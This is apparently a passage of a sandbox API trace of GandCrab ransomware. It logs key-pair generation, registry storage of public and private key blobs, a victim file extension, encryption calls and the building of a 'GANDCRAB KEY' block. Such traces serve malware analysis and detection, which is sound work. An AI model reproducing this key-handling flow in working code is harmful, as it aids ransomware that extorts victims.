dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x1e40000 [0066.616] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0066.616] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0066.616] CryptGenRandom (in: hProv=0x4c6888, dwLen=0x8, pbBuffer=0x1e40000 | out: pbBuffer=0x1e40000) returned 1 [0066.616] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0066.616] CryptReleaseContext (hProv=0x4c6888, dwFlags=0x0) returned 1 [0066.616] VirtualFree (lpAddress=0x1e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.617] lstrlenW (lpString=".titwmvjl") returned 9 [0066.617] lstrlenW (lpString=".titwmvjl ") returned 10 [0066.617] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0066.617] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x1e50000 [0066.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0066.617] CryptAcquireContextW (in: phProv=0x19f9c8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f9c8*=0x4c6888) returned 1 [0066.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0066.618] CryptGenKey (in: hProv=0x4c6888, Algid=0xa400, dwFlags=0x8000001, phKey=0x19f9cc | out: phKey=0x19f9cc*=0x4ca078) returned 1 [0067.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.303] CryptExportKey (in: hKey=0x4ca078, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1e40000, pdwDataLen=0x19fa2c | out: pbData=0x1e40000*, pdwDataLen=0x19fa2c*=0x114) returned 1 [0067.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.303] CryptExportKey (in: hKey=0x4ca078, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x1e50000, pdwDataLen=0x19fa28 | out: pbData=0x1e50000*, pdwDataLen=0x19fa28*=0x494) returned 1 [0067.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.304] CryptDestroyKey (hKey=0x4ca078) returned 1 [0067.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.304] CryptReleaseContext (hProv=0x4c6888, dwFlags=0x0) returned 1 [0067.304] VirtualAlloc (lpAddress=0x0, dwSize=0xa04, flAllocationType=0x3000, flProtect=0x4) returned 0x1e60000 [0067.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\keys_data\\data", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f9e8 | out: phkResult=0x19f9e8*=0x0) returned 0x2 [0067.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.304] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\keys_data\\data", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f9e8 | out: phkResult=0x19f9e8*=0x0) returned 0x2 [0067.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.304] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\ex_data\\data", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19f9e4, lpdwDisposition=0x0 | out: phkResult=0x19f9e4*=0x1ec, lpdwDisposition=0x0) returned 0x0 [0067.305] lstrlenW (lpString=".titwmvjl") returned 9 [0067.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.305] RegSetValueExW (in: hKey=0x1ec, lpValueName="ext", Reserved=0x0, dwType=0x3, lpData=0x1e30000*, cbData=0x14 | out: lpData=0x1e30000*) returned 0x0 [0067.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.306] RegCloseKey (hKey=0x1ec) returned 0x0 [0067.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.306] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f950*=0x4c6888) returned 1 [0067.306] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0067.307] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0067.307] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0067.307] CryptGenRandom (in: hProv=0x4c6888, dwLen=0x20, pbBuffer=0x19f9b4 | out: pbBuffer=0x19f9b4) returned 1 [0067.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.307] CryptReleaseContext (hProv=0x4c6888, dwFlags=0x0) returned 1 [0067.307] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.307] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f950*=0x4c6888) returned 1 [0067.308] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0067.308] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0067.308] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0067.308] CryptGenRandom (in: hProv=0x4c6888, dwLen=0x8, pbBuffer=0x19f9d4 | out: pbBuffer=0x19f9d4) returned 1 [0067.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.308] CryptReleaseContext (hProv=0x4c6888, dwFlags=0x0) returned 1 [0067.308] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.309] CryptAcquireContextW (in: phProv=0x19f928, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f928*=0x4c6888) returned 1 [0067.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.309] CryptImportKey (in: hProv=0x4c6888, pbData=0x1e10000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x19f92c | out: phKey=0x19f92c*=0x4ca078) returned 1 [0067.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.309] CryptGetKeyParam (in: hKey=0x4ca078, dwParam=0x8, pbData=0x19f920, pdwDataLen=0x19f924, dwFlags=0x0 | out: pbData=0x19f920*=0x800, pdwDataLen=0x19f924*=0x4) returned 1 [0067.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.310] CryptEncrypt (in: hKey=0x4ca078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e60004*, pdwDataLen=0x19f9e0*=0xc8, dwBufLen=0x100 | out: pbData=0x1e60004*, pdwDataLen=0x19f9e0*=0x100) returned 1 [0067.312] GetLastError () returned 0x0 [0067.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.312] CryptDestroyKey (hKey=0x4ca078) returned 1 [0067.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.312] CryptReleaseContext (hProv=0x4c6888, dwFlags=0x0) returned 1 [0067.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.312] CryptAcquireContextW (in: phProv=0x19f914, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f914*=0x4c6888) returned 1 [0067.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.313] CryptImportKey (in: hProv=0x4c6888, pbData=0x1e10000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x19f918 | out: phKey=0x19f918*=0x4c9db8) returned 1 [0067.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.313] CryptGetKeyParam (in: hKey=0x4c9db8, dwParam=0x8, pbData=0x19f90c, pdwDataLen=0x19f910, dwFlags=0x0 | out: pbData=0x19f90c*=0x800, pdwDataLen=0x19f910*=0x4) returned 1 [0067.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.313] CryptEncrypt (in: hKey=0x4c9db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e60104*, pdwDataLen=0x19f9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x1e60104*, pdwDataLen=0x19f9dc*=0x100) returned 1 [0067.313] GetLastError () returned 0x0 [0067.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.313] CryptDestroyKey (hKey=0x4c9db8) returned 1 [0067.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.314] CryptReleaseContext (hProv=0x4c6888, dwFlags=0x0) returned 1 [0067.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.314] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\keys_data\\data", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x19f9e0, lpdwDisposition=0x0 | out: phkResult=0x19f9e0*=0x1e8, lpdwDisposition=0x0) returned 0x0 [0067.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.314] RegSetValueExW (in: hKey=0x1e8, lpValueName="public", Reserved=0x0, dwType=0x3, lpData=0x1e40000*, cbData=0x114 | out: lpData=0x1e40000*) returned 0x0 [0067.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.315] RegSetValueExW (in: hKey=0x1e8, lpValueName="private", Reserved=0x0, dwType=0x3, lpData=0x1e60000*, cbData=0x698 | out: lpData=0x1e60000*) returned 0x0 [0067.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.315] RegCloseKey (hKey=0x1e8) returned 0x0 [0067.316] VirtualFree (lpAddress=0x1e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.316] VirtualAlloc (lpAddress=0x0, dwSize=0x8cd, flAllocationType=0x3000, flProtect=0x4) returned 0x1e50000 [0067.316] VirtualAlloc (lpAddress=0x0, dwSize=0x249, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0067.316] VirtualAlloc (lpAddress=0x0, dwSize=0x1728, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0067.317] lstrcpyW (in: lpString1=0x1e80000, lpString2="---BEGIN GANDCRAB KEY---" | out: lpString1="---BEGIN GANDCRAB KEY---") returned="---BEGIN GANDCRAB KEY---" [0067.317] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n") returned="---BEGIN GANDCRAB KEY---\r\n" [0067.317] lstrlenW (lpString="---BEGIN GANDCRAB KEY---\r\n") returned 26 [0067.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1e50000, cbMultiByte=-1, lpWideCharStr=0x1e80034, cchWideChar=2253 | out: lpWideCharStr="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") returned 2253 [0067.317] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n" [0067.317] lstrcatW (in: lpString1="---BEGIN GANDCRAB 